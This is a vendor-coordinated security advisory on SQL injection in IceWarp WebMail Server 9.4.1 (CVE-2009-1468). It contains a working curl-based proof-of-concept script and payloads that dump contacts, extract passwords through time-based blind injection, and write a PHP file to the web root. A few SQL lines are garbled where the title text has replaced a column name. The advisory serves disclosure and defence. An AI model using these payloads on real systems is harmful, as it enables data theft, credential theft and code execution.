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IceWarp WebMail Server: SQL Injection in Groupware Component

During a penetration test RedTeam Pentesting discovered multiple SQL-Injections in the IceWarp WebMail Server. Attackers that are in control of a user account for the web-based email and groupware components are able to execute arbitrary SQL SELECT statements and therefore read any data from the DBMS that are accessible by the Icewarp eMail Server.

Details

  • Product: IceWarp eMail Server / WebMail Server
  • Affected Versions: 9.4.1
  • Fixed Versions: 9.4.2
  • Vulnerability Type: SQL Injection
  • Security Risk: high
  • Vendor URL: http://www.icewarp.com/
  • Vendor Status: notified, fixed version released
  • Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2009-003
  • Advisory Status: published
  • CVE: CVE-2009-1468
  • CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1468

Introduction

“Feature complete yet easy to use, WebMail Server Pro provides feature rich Web 2.0 web-based access to email, calendars, contacts, files and shared data from any computer with browser and internet connection, without the usual configuration hassle. Thanks to advanced technologies and application-like look and feel, Pro suggests it was born to become the ultimate replacement of Outlook and similar desktop mail clients.”

(from the vendor’s homepage)

More Details

The IceWarp eMail Server’s web-based groupware component provides functionality for users to store, for example, contact information, notes, a journal or files. A search form can be used to search for such stored items.

When users search, for example, for certain files, using the provided search form, an HTTP POST request containing the search query in XML form is sent from the browser to the PHP script at https://example.com/webmail/server/webmail.php:

<iq sid="73aaafec4a8db27af49c4c43bca4ac13"
    uid="1239870305230" type="get" format="json">
  <query xmlns="webmail:iq:items">
    <account uid="user@example.com">
      <folder uid="Files">
        <item>
          <values>
            <evntitle> </evntitle>
            <evnnote> </evnnote>
            [..]
          </values>
          <filter>
            <offset>0</offset>
            <limit>60</limit>
            <order_by>EVNTYPE asc</order_by>
            <sql>(EVNIceWarp WebMail Server: SQL Injection in Groupware Component LIKE '%SQL INJECTION TEST%' OR 
                  EVNNOTE LIKE '%SQL INJECTION TEST%')
            </sql>
          </filter>
        </item>
      </folder>
    </account>
  </query>
</iq>

It is evident that SQL expressions are used to find matching items and order the results. Using the information provided within the POST request, two SQL queries are constructed and executed on the database (relevant user-controlled parts marked with a leading “>”):

Select EVN_ID, EVNRCR_ID, evntitle, evnnote, evnlocation, evnstartdate,
       evnstarttime, evntype, evncolor, evncomplete
  From Event Where
    (EVNGRP_ID = '3a7e072a3002') And
    (
      (
>        (EVNIceWarp WebMail Server: SQL Injection in Groupware Component LIKE '%SQL INJECTION TEST%' OR
>         EVNNOTE LIKE '%SQL INJECTION TEST%')
      ) AND
      evnclass <> 'O'
    ) And
    (EvnFolder='Files') 
    Order By
>       EVNLOCATION asc
    LIMIT 0,45
Select Count(EVN_ID) As Count_ From Event Where
  (EVNGRP_ID = '3a7e072a3002') And
  (
>    (EVNIceWarp WebMail Server: SQL Injection in Groupware Component LIKE '%SQL INJECTION TEST%' OR
>     EVNNOTE LIKE '%SQL INJECTION TEST%')
  ) And
  (EvnFolder='Files')

Data is only returned from the database to the web application when both queries are syntactically correct. Due to a different nesting level of parentheses around the SQL queries’ user-manipulable parts, successful (non-blind) SQL injection requires the use of two elements within the original HTTP POST request.

The following examples show the two queries that are executed when the <sql> element contains the string “0=1) /* " and the <order_by> element contains the string “*/)–”. User input that is active within an SQL query is marked with a “>”, user input that begins or ends a comment is marked with a “+”, and application-provided query parts that are now commented out are marked with a “|”:

Select EVN_ID, EVNRCR_ID, evntitle, evnnote, evnlocation, evnstartdate,
       evnstarttime, evntype, evncolor, evncomplete
  From Event Where
    (EVNGRP_ID = '3a7e072a3002') And
    (
      (
>        0=1)
+        /* part of the <sql> element
|      ) AND
|      evnclass <> 'O'
|    ) And
|    (EvnFolder='Files') Order By
+    part of the <order_by> element */
>    )--
    LIMIT 0,45
Select Count(EVN_ID) As Count_ From Event Where
  (EVNGRP_ID = '3a7e072a3002') And
  (
>     0=1)
+     /* part of the <sql> element
|   ) And
|   (EvnFolder='Files')

Note that this method requires a DBMS that allows unbalanced C-style (/**/) comments in its SQL syntax, such as SQLite3 or MySQL < 5.0.51. For other DBMS, blind SQL injection into the first SQL query is another option.

Proof of Concept

The following shell script can be used to construct a valid search request as mentioned above. It expects a valid session ID and corresponding username as commandline arguments, followed by arguments that are inserted into the <order_by> and <sql> elements of the POST request.

#!/bin/sh

sid=$1
uid=$2
orderby=$3
if [ -n "$4" ] ; then
    sql=$4
else
    sql="1=0)/*"
fi
curl --silent -d '<iq sid="'$sid'" type="get" format="json">
  <query xmlns="webmail:iq:items">
    <account uid="'$uid'">
      <folder uid="Files">
        <item><values><evntitle></evntitle></values>
          <filter><offset></offset><limit></limit>
            <order_by>'"$orderby"'</order_by>
            <sql>'"$sql"'</sql>
          </filter>
        </item>
      </folder>
    </account>
  </query>
</iq>' https://example.com/webmail/server/webmail.php | \
perl -pe 's/{/\n/g' | grep "result::" | \
sed -e 's/^"VALUE":"result:://' -e 's/"}]}],"ATTRIBUTES":$//'

For DBMS that support unbalanced C-Style comments, data can for example be retrieved from the database as follows:

$ ./sql_inject.sh 73aaafec4a8db27af49c4c43bca4ac13 user@example.com \
"*/) UNION SELECT random(),'NULL',
('result::'||ItmFirstname||':'||ItmSurname) FROM ContactItem"

Joe:Plumber
John:Doe
Agent:Smith
Jane:Doe
Joe:User

For other DBMS, blind SQL injection is a possibility. The following example illustrates how a password for a certain user account is retrieved on an installation of the IceWarp eMail server that uses a recent version of MySQL for storing user account information:

$ time ./sql_inject.sh \
73aaafec4a8db27af49c4c43bca4ac13 user@example.com "" \
"1=0)) UNION SELECT 1,2,IF((SELECT COUNT(*) FROM users
WHERE U_Mailbox='user' AND U_Password LIKE 'a&#37;'),SLEEP(5),1)-- "
real    0m0.334s
user    0m0.053s
sys     0m0.007s
[...]
$ time ./sql_inject.sh \
73aaafec4a8db27af49c4c43bca4ac13 user@example.com "" \
"1=0)) UNION SELECT 1,2,IF((SELECT COUNT(*) FROM users
WHERE U_Mailbox='user' AND U_Password LIKE 't&#37;'),SLEEP(5),1)-- "
real    0m5.441s
user    0m0.037s
sys     0m0.013s
[...]
$ time ./sql_inject.sh \
73aaafec4a8db27af49c4c43bca4ac13 user@example.com "" \
"1=0)) UNION SELECT 1,2,IF((SELECT COUNT(*) FROM users
WHERE U_Mailbox='user' AND U_Password LIKE 'test'),SLEEP(5),1)-- "
real    0m5.418s
user    0m0.040s
sys     0m0.010s

Depending on the DBMS configuration, creation of arbitrary files and/or code execution might also be possible. The following example illustrates the creation of a PHP script within the web application’s root directory using the SELECT .. INTO DUMPFILE functionality provided by MySQL:

$ ./sql_inject.sh a3779402b23fa4acdcba6be907521acb user@example.com "" \
"1=0)) UNION SELECT '','','&lt;?php phpinfo();?&gt;' 
INTO DUMPFILE 'c:/Program Files/Merak/html/webmail/phpinfo.php'-- "

Workaround

None.

Fix

Upgrade to version 9.4.2.

Security Risk

The risk of this vulnerability is estimated as high. Depending on the IceWarp eMail Server configuration, and configuration of the DBMS used, attackers authenticated to the web application can leverage it to retrieve, for example, users’ contacts, notes or journal entries, obtain user credentials, and/or execute arbitrary code.

History

  • 2009-03-23 Vulnerabilities identified during a penetration test
  • 2009-04-01 Meeting with customer and vendor
  • 2009-04-28 CVE number assigned
  • 2009-05-05 Vendor publishes fixed version
  • 2009-05-05 Advisory released

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RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

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